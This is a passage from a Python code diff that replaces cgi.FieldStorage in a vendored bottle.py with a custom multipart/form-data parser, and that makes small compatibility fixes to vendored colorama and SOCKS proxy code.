# to stop doing useless work
|
||||
raise HTTPError(422, 'Malformed headers, found invalid sequence: %s' % invalid_sequence)
|
||||
else:
|
||||
assert expected_len >= 2 # (CR)LFCRLF or (CRLF)CRLF
|
||||
self.headers_end_expected = None
|
||||
assert self.headers_end_expected is None
|
||||
s = self.end_headers_patt.search(chunk, base)
|
||||
if s is None: return
|
||||
end_found = s.start(1)
|
||||
if end_found >= 0: return end_found
|
||||
end_head = s.group(2)
|
||||
if end_head is not None:
|
||||
self.headers_end_expected = CRLFx2[len(end_head):]
|
||||
|
||||
|
||||
class MPBodyMarkup:
|
||||
def __init__(self, boundary):
|
||||
self.markups = []
|
||||
self.error = None
|
||||
if CR in boundary:
|
||||
raise HTTPError(422, 'The `CR` must not be in the boundary: %s' % boundary)
|
||||
boundary = HYPHENx2 + boundary
|
||||
self.boundary = boundary
|
||||
token = CRLF + boundary
|
||||
self.tlen = len(token)
|
||||
self.token = token
|
||||
self.trest = self.trest_len = None
|
||||
self.abspos = 0
|
||||
self.abs_start_section = 0
|
||||
self.headers_eater = MPHeadersEaeter()
|
||||
self.cur_meth = self._eat_start_boundary
|
||||
self._eat_headers = self.headers_eater.eat
|
||||
self.stopped = False
|
||||
self.idx = idx = defaultdict(list) # 1-based indices for each token symbol
|
||||
for i, c in enumerate(token, start=1):
|
||||
idx[c].append([i, token[:i]])
|
||||
|
||||
def _match_tail(self, s, start, end):
|
||||
idxs = self.idx.get(s[end - 1])
|
||||
if idxs is None: return
|
||||
slen = end - start
|
||||
assert slen <= self.tlen
|
||||
for i, thead in idxs: # idxs is 1-based index
|
||||
search_pos = slen - i
|
||||
if search_pos < 0: return
|
||||
if s[start + search_pos:end] == thead: return i # if s_tail == token_head
|
||||
|
||||
def _iter_markup(self, chunk):
|
||||
if self.stopped:
|
||||
raise StopMarkupException()
|
||||
cur_meth = self.cur_meth
|
||||
abs_start_section = self.abs_start_section
|
||||
start_next_sec = 0
|
||||
skip_start = 0
|
||||
tlen = self.tlen
|
||||
eat_data, eat_headers = self._eat_data, self._eat_headers
|
||||
while True:
|
||||
try:
|
||||
end_section = cur_meth(chunk, start_next_sec)
|
||||
except StopMarkupException:
|
||||
self.stopped = True
|
||||
return
|
||||
if end_section is None: break
|
||||
if cur_meth == eat_headers:
|
||||
sec_name = 'headers'
|
||||
start_next_sec = end_section + CRLFx2_LEN
|
||||
cur_meth = eat_data
|
||||
skip_start = 0
|
||||
elif cur_meth == eat_data:
|
||||
sec_name = 'data'
|
||||
start_next_sec = end_section + tlen
|
||||
skip_start = CRLF_LEN
|
||||
cur_meth = eat_headers
|
||||
else:
|
||||
assert cur_meth == self._eat_start_boundary
|
||||
sec_name = 'data'
|
||||
start_next_sec = end_section + tlen
|
||||
skip_start = CRLF_LEN
|
||||
cur_meth = eat_headers
|
||||
|
||||
# if the body starts with a hyphen,
|
||||
# we will have a negative abs_end_section equal to the length of the CRLF
|
||||
abs_end_section = self.abspos + end_section
|
||||
if abs_end_section < 0:
|
||||
assert abs_end_section == -CRLF_LEN
|
||||
end_section = -self.abspos
|
||||
yield sec_name, (abs_start_section, self.abspos + end_section)
|
||||
abs_start_section = self.abspos + start_next_sec + skip_start
|
||||
self.abspos += len(chunk)
|
||||
self.cur_meth = cur_meth
|
||||
self.abs_start_section = abs_start_section
|
||||
|
||||
def _eat_start_boundary(self, chunk, base):
|
||||
if self.trest is None:
|
||||
chunk_start = chunk[base: base + 1]
|
||||
if not chunk_start: return
|
||||
if chunk_start == CR: return self._eat_data(chunk, base)
|
||||
boundary = self.boundary
|
||||
if chunk.startswith(boundary): return base - CRLF_LEN
|
||||
if chunk_start != boundary[:1]:
|
||||
raise HTTPError(
|
||||
422, 'Invalid multipart/formdata body start, expected hyphen or CR, got: %s' % chunk_start)
|
||||
self.trest = boundary
|
||||
self.trest_len = len(boundary)
|
||||
end_section = self._eat_data(chunk, base)
|
||||
if end_section is not None: return end_section
|
||||
|
||||
def _eat_data(self, chunk, base):
|
||||
chunk_len = len(chunk)
|
||||
token, tlen, trest, trest_len = self.token, self.tlen, self.trest, self.trest_len
|
||||
start = base
|
||||
match_tail = self._match_tail
|
||||
part = None
|
||||
while True:
|
||||
end = start + tlen
|
||||
if end > chunk_len:
|
||||
part = chunk[start:]
|
||||
break
|
||||
if trest is not None:
|
||||
if chunk[start:start + trest_len] == trest:
|
||||
data_end = start + trest_len - tlen
|
||||
self.trest_len = self.trest = None
|
||||
return data_end
|
||||
else:
|
||||
trest_len = trest = None
|
||||
matched_len = match_tail(chunk, start, end)
|
||||
if matched_len is not None:
|
||||
if matched_len == tlen:
|
||||
self.trest_len = self.trest = None
|
||||
return start
|
||||
else:
|
||||
trest_len, trest = tlen - matched_len, token[matched_len:]
|
||||
start += tlen
|
||||
# process the tail of the chunk
|
||||
if part:
|
||||
part_len = len(part)
|
||||
if trest is not None:
|
||||
if part_len < trest_len:
|
||||
if trest.startswith(part):
|
||||
trest_len -= part_len
|
||||
trest = trest[part_len:]
|
||||
part = None
|
||||
else:
|
||||
trest_len = trest = None
|
||||
else:
|
||||
if part.startswith(trest):
|
||||
data_end = start + trest_len - tlen
|
||||
self.trest_len = self.trest = None
|
||||
return data_end
|
||||
trest_len = trest = None
|
||||
|
||||
if part is not None:
|
||||
assert trest is None
|
||||
matched_len = match_tail(part, 0, part_len)
|
||||
if matched_len is not None:
|
||||
trest_len, trest = tlen - matched_len, token[matched_len:]
|
||||
self.trest_len, self.trest = trest_len, trest
|
||||
|
||||
def _parse(self, chunk):
|
||||
for name, start_end in self._iter_markup(chunk):
|
||||
self.markups.append([name, start_end])
|
||||
|
||||
def parse(self, chunk):
|
||||
if self.error is not None: return
|
||||
try:
|
||||
self._parse(chunk)
|
||||
except Exception as exc:
|
||||
self.error = exc
|
||||
|
||||
|
||||
class MPBytesIOProxy:
|
||||
def __init__(self, src, start, end):
|
||||
self._src = src
|
||||
self._st = start
|
||||
self._end = end
|
||||
self._pos = start
|
||||
|
||||
def tell(self):
|
||||
return self._pos - self._st
|
||||
|
||||
def seek(self, pos):
|
||||
if pos < 0: pos = 0
|
||||
self._pos = min(self._st + pos, self._end)
|
||||
|
||||
def read(self, sz=None):
|
||||
max_sz = self._end - self._pos
|
||||
if max_sz <= 0:
|
||||
return tob('')
|
||||
if sz is not None and sz > 0:
|
||||
sz = min(sz, max_sz)
|
||||
else:
|
||||
sz = max_sz
|
||||
self._src.seek(self._pos)
|
||||
self._pos += sz
|
||||
return self._src.read(sz)
|
||||
|
||||
def writable(self):
|
||||
return False
|
||||
|
||||
def fileno(self):
|
||||
raise OSError('Not supported')
|
||||
|
||||
def closed(self):
|
||||
return self._src.closed()
|
||||
|
||||
def close(self):
|
||||
pass
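Assuming the MPBytesIOProxy class defined above is in scope, a hedged usage sketch of the idea: a read-only, seekable window over a byte range of a larger buffer (offsets and sample bytes are made up):

    from io import BytesIO

    # A 13-byte "data" section starts at offset 23 of this toy body.
    src = BytesIO(b"--boundary\r\nheaders\r\n\r\npayload-bytes\r\n--boundary--")
    proxy = MPBytesIOProxy(src, start=23, end=36)
    print(proxy.read())   # b'payload-bytes'
    proxy.seek(0)
    print(proxy.read(7))  # b'payload'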
|
||||
|
||||
|
||||
class MPHeader:
|
||||
def __init__(self, name, value, options):
|
||||
self.name = name
|
||||
self.value = value
|
||||
self.options = options
|
||||
|
||||
|
||||
class MPFieldStorage:
|
||||
|
||||
_patt = re.compile(tonat('(.+?)(=(.+?))?(;|$)'))
|
||||
|
||||
def __init__(self):
|
||||
self.name = None
|
||||
self.value = None
|
||||
self.filename = None
|
||||
self.file = None
|
||||
self.ctype = None
|
||||
self.headers = {}
|
||||
|
||||
def read(self, src, headers_section, data_section, max_read):
|
||||
start, end = headers_section
|
||||
sz = end - start
|
||||
has_read = sz
|
||||
if has_read > max_read:
|
||||
raise HTTPError(413, 'Request entity too large')
|
||||
src.seek(start)
|
||||
headers_raw = tonat(src.read(sz))
|
||||
for header_raw in headers_raw.splitlines():
|
||||
header = self.parse_header(header_raw)
|
||||
self.headers[header.name] = header
|
||||
if header.name == 'Content-Disposition':
|
||||
self.name = header.options['name']
|
||||
self.filename = header.options.get('filename')
|
||||
elif header.name == 'Content-Type':
|
||||
self.ctype = header.value
|
||||
if self.name is None:
|
||||
raise HTTPError(422, 'Noname field found while parsing multipart/formdata body: %s' % header_raw)
|
||||
if self.filename is not None:
|
||||
self.file = MPBytesIOProxy(src, *data_section)
|
||||
else:
|
||||
start, end = data_section
|
||||
sz = end - start
|
||||
if sz:
|
||||
has_read += sz
|
||||
if has_read > max_read:
|
||||
raise HTTPError(413, 'Request entity too large')
|
||||
src.seek(start)
|
||||
self.value = tonat(src.read(sz))
|
||||
else:
|
||||
self.value = ''
|
||||
return has_read
|
||||
|
||||
@classmethod
|
||||
def parse_header(cls, s):
|
||||
htype, rest = s.split(':', 1)
|
||||
opt_iter = cls._patt.finditer(rest)
|
||||
hvalue = next(opt_iter).group(1).strip()
|
||||
dct = {}
|
||||
for it in opt_iter:
|
||||
k = it.group(1).strip()
|
||||
v = it.group(3)
|
||||
if v is not None:
|
||||
v = v.strip('"')
|
||||
dct[k.lower()] = v
|
||||
return MPHeader(name=htype, value=hvalue, options=dct)
|
||||
|
||||
    @classmethod
    def iter_items(cls, src, markup, max_read):
        iter_markup = iter(markup)
        # check & skip empty data (body should start from empty data)
        null_data = next(iter_markup, None)
        if null_data is None: return
        sec_name, [start, end] = null_data
        assert sec_name == 'data'
        if end > 0:
            raise HTTPError(
                422, 'Malformed multipart/formdata, unexpected data before the first boundary at: [%d:%d]'
                % (start, end))
        headers = next(iter_markup, None)
        data = next(iter_markup, None)
        while headers:
            sec_name, headers_slice = headers
            assert sec_name == 'headers'
            if not data:
                raise HTTPError(
                    422, 'Malformed multipart/formdata, no data found for the field at: [%d:%d]'
                    % tuple(headers_slice))
            sec_name, data_slice = data
            assert sec_name == 'data'
            field = cls()
            has_read = field.read(src, headers_slice, data_slice, max_read=max_read)
            max_read -= has_read
            yield field
            headers = next(iter_markup, None)
            data = next(iter_markup, None)

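parse_header() above replaces the header splitting that cgi.FieldStorage used to do: everything before the first ';' becomes the header value, and each following key=value pair (quotes stripped, key lowercased) lands in the options dict. A quick sketch with a typical upload header (field and file names invented):

header = MPFieldStorage.parse_header(
    'Content-Disposition: form-data; name="avatar"; filename="cat.png"')
print(header.name)       # 'Content-Disposition'
print(header.value)      # 'form-data'
print(header.options)    # {'name': 'avatar', 'filename': 'cat.png'}
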
class BaseRequest(object):
    """ A wrapper for WSGI environment dictionaries that adds a lot of
@@ -1326,6 +1720,10 @@ class BaseRequest(object):

    @DictProperty('environ', 'bottle.request.body', read_only=True)
    def _body(self):
        mp_markup = None
        mp_boundary_match = MULTIPART_BOUNDARY_PATT.match(self.environ.get('CONTENT_TYPE', ''))
        if mp_boundary_match is not None:
            mp_markup = MPBodyMarkup(tob(mp_boundary_match.group(1)))
        try:
            read_func = self.environ['wsgi.input'].read
        except KeyError:
@@ -1335,12 +1733,15 @@ class BaseRequest(object):
        body, body_size, is_temp_file = BytesIO(), 0, False
        for part in body_iter(read_func, self.MEMFILE_MAX):
            body.write(part)
            if mp_markup is not None:
                mp_markup.parse(part)
            body_size += len(part)
            if not is_temp_file and body_size > self.MEMFILE_MAX:
                body, tmp = NamedTemporaryFile(mode='w+b'), body
                body.write(tmp.getvalue())
                del tmp
                is_temp_file = True
        body.multipart_markup = mp_markup
        self.environ['wsgi.input'] = body
        body.seek(0)
        return body
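The loop above does two jobs in one pass: it buffers the body (spilling to a NamedTemporaryFile once it outgrows MEMFILE_MAX) and feeds every chunk to MPBodyMarkup, so the multipart offsets are ready by the time .body is returned. The buffering idiom on its own, as a minimal self-contained sketch (stream and limit invented for the example):

from io import BytesIO
from tempfile import NamedTemporaryFile

MEMFILE_MAX = 100 * 1024                      # example limit for the sketch
stream = BytesIO(b'x' * (300 * 1024))         # stand-in for wsgi.input

body, body_size, is_temp_file = BytesIO(), 0, False
for part in iter(lambda: stream.read(8192), b''):
    body.write(part)
    body_size += len(part)
    if not is_temp_file and body_size > MEMFILE_MAX:
        body, tmp = NamedTemporaryFile(mode='w+b'), body
        body.write(tmp.getvalue())            # copy what was buffered in memory so far
        del tmp
        is_temp_file = True
body.seek(0)
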
@@ -1378,7 +1779,7 @@ class BaseRequest(object):
    def POST(self):
        """ The values of :attr:`forms` and :attr:`files` combined into a single
            :class:`FormsDict`. Values are either strings (form values) or
            instances of :class:`cgi.FieldStorage` (file uploads).
            instances of :class:`MPBytesIOProxy` (file uploads).
        """
        post = FormsDict()
        # We default to application/x-www-form-urlencoded for everything that
@@ -1389,18 +1790,15 @@ class BaseRequest(object):
                post[key] = value
            return post

        safe_env = {'QUERY_STRING': ''} # Build a safe environment for cgi
        for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):
            if key in self.environ: safe_env[key] = self.environ[key]
        args = dict(fp=self.body, environ=safe_env, keep_blank_values=True)

        if py3k:
            args['encoding'] = 'utf8'
            post.recode_unicode = False
        data = cgi.FieldStorage(**args)
        self['_cgi.FieldStorage'] = data #http://bugs.python.org/issue18394
        data = data.list or []
        for item in data:
        body = self.body
        markup = body.multipart_markup
        if markup is None:
            raise HTTPError(400, '`boundary` required for mutlipart content')
        elif markup.error is not None:
            raise markup.error
        for item in MPFieldStorage.iter_items(body, markup.markups, self.MEMFILE_MAX):
            if item.filename is None:
                post[item.name] = item.value
            else:
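For reference, this is the wire format everything above is slicing up: each part opens with '--<boundary>', followed by its own headers, a blank line and the raw payload, and '--<boundary>--' closes the body. A hand-written example (boundary, field and file names invented):

boundary = 'ExampleBoundary123'
raw_body = (
    '--{b}\r\n'
    'Content-Disposition: form-data; name="comment"\r\n'
    '\r\n'
    'hello world\r\n'
    '--{b}\r\n'
    'Content-Disposition: form-data; name="upload"; filename="notes.txt"\r\n'
    'Content-Type: text/plain\r\n'
    '\r\n'
    'file contents here\r\n'
    '--{b}--\r\n'
).format(b=boundary).encode('utf-8')
# Per the docstring change above, POST() exposes 'comment' as a plain string,
# while the payload of the 'upload' part is reached through an MPBytesIOProxy.
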
4
thirdparty/colorama/ansitowin32.py
vendored
@@ -243,6 +243,6 @@ class AnsiToWin32(object):
                # 0 - change title and icon (we will only change title)
                # 1 - change icon (we don't support this)
                # 2 - change title
                if params[0] in '02':
                    winterm.set_title(params[1])
                # if params[0] in '02':
                #     winterm.set_title(params[1])
        return text
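The commented-out lines handled the xterm OSC title sequence, which programs emit as ESC ] <code> ; <text> BEL; after this change the vendored colorama simply skips the window-title update for codes 0 and 2. For illustration, the byte layout of such a sequence (title text arbitrary):

import sys

# OSC 2 ("change window title"), terminated by BEL -- the kind of sequence
# whose set_title handling is disabled in the hunk above.
sys.stdout.write('\033]2;example title\007')
sys.stdout.flush()
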
16
thirdparty/socks/socks.py
vendored
@@ -185,23 +185,23 @@ class socksocket(socket.socket):
        # We'll receive the server's response to determine which
        # method was selected
        chosenauth = self.__recvall(2)
        if chosenauth[0:1] != chr(0x05).encode():
        if chosenauth[0:1] != b'\x05':
            self.close()
            raise GeneralProxyError((1, _generalerrors[1]))
        # Check the chosen authentication method
        if chosenauth[1:2] == chr(0x00).encode():
        if chosenauth[1:2] == b'\x00':
            # No authentication is required
            pass
        elif chosenauth[1:2] == chr(0x02).encode():
        elif chosenauth[1:2] == b'\x02':
            # Okay, we need to perform a basic username/password
            # authentication.
            self.sendall(chr(0x01).encode() + chr(len(self.__proxy[4])).encode() + self.__proxy[4].encode() + chr(len(self.__proxy[5])).encode() + self.__proxy[5].encode())
            self.sendall(b'\x01' + chr(len(self.__proxy[4])).encode() + self.__proxy[4].encode() + chr(len(self.__proxy[5])).encode() + self.__proxy[5].encode())
            authstat = self.__recvall(2)
            if authstat[0:1] != chr(0x01).encode():
            if authstat[0:1] != b'\x01':
                # Bad response
                self.close()
                raise GeneralProxyError((1, _generalerrors[1]))
            if authstat[1:2] != chr(0x00).encode():
            if authstat[1:2] != b'\x00':
                # Authentication failed
                self.close()
                raise Socks5AuthError((3, _socks5autherrors[3]))
@@ -209,7 +209,7 @@ class socksocket(socket.socket):
        else:
            # Reaching here is always bad
            self.close()
            if chosenauth[1] == chr(0xFF).encode():
            if chosenauth[1:2] == b'\xff':
                raise Socks5AuthError((2, _socks5autherrors[2]))
            else:
                raise GeneralProxyError((1, _generalerrors[1]))
@@ -219,7 +219,7 @@ class socksocket(socket.socket):
        # use the IPv4 address request even if remote resolving was specified.
        try:
            ipaddr = socket.inet_aton(destaddr)
            req = req + chr(0x01).encode() + ipaddr
            req = req + b'\x01' + ipaddr
        except socket.error:
            # Well it's not an IP number, so it's probably a DNS name.
            if self.__proxy[3]:
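Most of this hunk is cosmetic, since chr(n).encode() equals the bytes literal for values below 0x80, but the last comparison was genuinely broken on Python 3: indexing a bytes object yields an int, and chr(0xFF).encode() is the two-byte UTF-8 sequence b'\xc3\xbf', so the old check could never match. A quick demonstration:

chosenauth = b'\x05\xff'            # example SOCKS5 reply: version 5, "no acceptable methods"
print(chr(0x05).encode())           # b'\x05'      -- identical to the literal for values < 0x80
print(chr(0xff).encode())           # b'\xc3\xbf'  -- two bytes, so the old 0xFF test never matched
print(chosenauth[1])                # 255          -- indexing bytes gives an int on Python 3
print(chosenauth[1:2] == b'\xff')   # True         -- the patched comparison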